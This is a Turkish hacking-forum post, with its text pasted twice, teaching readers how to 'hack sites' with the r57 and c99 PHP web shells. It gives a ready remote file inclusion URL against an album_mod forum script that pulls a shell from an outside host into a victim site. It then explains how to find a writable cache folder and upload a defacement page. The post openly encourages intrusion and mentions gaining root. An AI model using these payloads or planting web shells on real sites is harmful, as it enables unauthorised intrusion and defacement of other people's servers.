r57 kullanmak
1 sayfadaki 1 sayfası
r57 kullanmak
tarafından Admin C.tesi Ekim 25, 2008 1:53 am
r57 ile ne yapabiliriz artik full türkçe olduğu için kolayca site hackliyebilirsiniz ve dahasi ni yapabilirsiniz exploit biliyorsaniz root bile olursunuz
Normalde Site Adını Değiştirdim Tabi Onu Kurban Site
Olarak Gösterdim Shellin Adresini Değiştirdim Tabi Burada Reklam Olur Versem Onun İçin Her Türk ün Anlayacağı r57.i Nasıl Siteye Sokacağımızı Anlatıyorum
Şimdiden Kolay Gelsinnn
Örnek=
http://kurban.site/forum/album_mod/album_nuffimage_box.php?action=logout&album_root_path=http%3A%2F%2Fwww.shelliniz.com%2Fc99.txt%3F&
Bu şu demektir:
http:// Düşündüğün bir site var buda (kurban site)
Bu sitenin Forum Klasörünün icinde bir klasör daha var album_mod adında..Diyelim
yani: http://Kurban.site/forum/album_mod (adres bu oldu diyelim)
http://kurban.site/forum/album_mod adresin album_mod klasörünün icinde album_nuffimage_box.php adında bir php dosyası var . (sayfa)
http://kurban.site/forum/album_mod/album_nuffimage_box.php
bu sayfanın icinde kodlar var,ki bu kodlar o sayfayı oluşturur.
ve hatalı kodlamadan dolayı bir acık meydana gelmiş. Bu sayfanın icindeki kodlama hatasıda su :
action=logout&album_root_path
Bizde bu acıktan faydalanarak sitenin icine shell sokuyoruz.
acık tam şu şekil :
http://kurban.site/forum/album_mod/album_nuffimage_box.php?action=logout&album_root_path=
anlamı: bu sitenin forum klasöründeki album_mod klasörünün icindeki album_nuffimage_box.php nin icindeki action=logout&album_root_path bu hata yapılmış kodları http://www.shelliniz.com/c99.txt? adresine çağır...
Bu hatalı kodlamadan kaynaklanan bu RFI acığını shell imize cağırıyoruz.
Adres şöyle oluyor :
http://kurban.site/forum/album_mod/album_nuffimage_box.php?action=logout&album_root_path=http://www.shelliniz.com/c99.txt?
Böylelikle hedef sitenin icine sızmış oluyoruz.Geriye kalan şey ise soktuğumuz shell i kullanabilme yeteneğidir. Onuda halledersiniz artık. Bu shell ile siteyi deface etmek mümkün oluyor.
Yani Örnek Olarak R57.txt Kullanma buda R57 Dediğimiz Bir Shell scriptinin siteye injeksiyonlanması Olarak Düşünelim:
http://kurban.site/forum/album_mod/album_nuffimage_box.php?action=logout&album_root_path=http://www.shelliniz.com/r57.txt?
/forum/album_mod Work directory(Bulunan dizin) nin karsısında silinecek dosya var diyelim
Şöyle kalsın : /home/kordak/public_html/ ve Change(Degistir) ye tıkla
Acılacak sayfa sitenin ana dizinidir.
Ve anadizinde :
2922225 drwxrwxrwx 2 kordak nobody 512 24.11.2007 01:29 cache (Yazan yer var)
drwxrwxrwx (klasörün önündeki bu işaret, klasörün yazma izni olduğunu gösterir)
Shell deki : /home/kordak/public_html yazan yer varya oraya şunu ekleme yapalım /cache
/home/kordak/public_html/cache olacak ... sonra Change(Degistir) ye tıkla . o klasöre girecek.
Klasör zaten yazma izni olduğu icin . acılan sayfada alta doğru in Gözat var oradan index.html (hack indexi) ni bilgisayarından seç ve siteye upload et .. bitti. Biz şimdi hangi sayfayı hacklamış olduk ?
http://kurban.site/cache buraya gir ve indexine bak diyelim
Normalde Site Adını Değiştirdim Tabi Onu Kurban Site
Olarak Gösterdim Shellin Adresini Değiştirdim Tabi Burada Reklam Olur Versem Onun İçin Her Türk ün Anlayacağı r57.i Nasıl Siteye Sokacağımızı Anlatıyorum
Şimdiden Kolay Gelsinnn
Örnek=
http://kurban.site/forum/album_mod/album_nuffimage_box.php?action=logout&album_root_path=http%3A%2F%2Fwww.shelliniz.com%2Fc99.txt%3F&
Bu şu demektir:
http:// Düşündüğün bir site var buda (kurban site)
Bu sitenin Forum Klasörünün icinde bir klasör daha var album_mod adında..Diyelim
yani: http://Kurban.site/forum/album_mod (adres bu oldu diyelim)
http://kurban.site/forum/album_mod adresin album_mod klasörünün icinde album_nuffimage_box.php adında bir php dosyası var . (sayfa)
http://kurban.site/forum/album_mod/album_nuffimage_box.php
bu sayfanın icinde kodlar var,ki bu kodlar o sayfayı oluşturur.
ve hatalı kodlamadan dolayı bir acık meydana gelmiş. Bu sayfanın icindeki kodlama hatasıda su :
action=logout&album_root_path
Bizde bu acıktan faydalanarak sitenin icine shell sokuyoruz.
acık tam şu şekil :
http://kurban.site/forum/album_mod/album_nuffimage_box.php?action=logout&album_root_path=
anlamı: bu sitenin forum klasöründeki album_mod klasörünün icindeki album_nuffimage_box.php nin icindeki action=logout&album_root_path bu hata yapılmış kodları http://www.shelliniz.com/c99.txt? adresine çağır...
Bu hatalı kodlamadan kaynaklanan bu RFI acığını shell imize cağırıyoruz.
Adres şöyle oluyor :
http://kurban.site/forum/album_mod/album_nuffimage_box.php?action=logout&album_root_path=http://www.shelliniz.com/c99.txt?
Böylelikle hedef sitenin icine sızmış oluyoruz.Geriye kalan şey ise soktuğumuz shell i kullanabilme yeteneğidir. Onuda halledersiniz artık. Bu shell ile siteyi deface etmek mümkün oluyor.
Yani Örnek Olarak R57.txt Kullanma buda R57 Dediğimiz Bir Shell scriptinin siteye injeksiyonlanması Olarak Düşünelim:
http://kurban.site/forum/album_mod/album_nuffimage_box.php?action=logout&album_root_path=http://www.shelliniz.com/r57.txt?
/forum/album_mod Work directory(Bulunan dizin) nin karsısında silinecek dosya var diyelim
Şöyle kalsın : /home/kordak/public_html/ ve Change(Degistir) ye tıkla
Acılacak sayfa sitenin ana dizinidir.
Ve anadizinde :
2922225 drwxrwxrwx 2 kordak nobody 512 24.11.2007 01:29 cache (Yazan yer var)
drwxrwxrwx (klasörün önündeki bu işaret, klasörün yazma izni olduğunu gösterir)
Shell deki : /home/kordak/public_html yazan yer varya oraya şunu ekleme yapalım /cache
/home/kordak/public_html/cache olacak ... sonra Change(Degistir) ye tıkla . o klasöre girecek.
Klasör zaten yazma izni olduğu icin . acılan sayfada alta doğru in Gözat var oradan index.html (hack indexi) ni bilgisayarından seç ve siteye upload et .. bitti. Biz şimdi hangi sayfayı hacklamış olduk ?
http://kurban.site/cache buraya gir ve indexine bak diyelim
Admin- Admin
-
Mesaj Sayısı : 134
Metin Alanı : <center><font color="white"><marquee direction="left" style="background:red">Vatanını Seven Görevini En İyi Yapandı
.</marquee></font></center>
Madalyalar :
Kayıt tarihi : 24/10/08
Tecrübe
İtibar:
(100/100) -
1 sayfadaki 1 sayfası
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz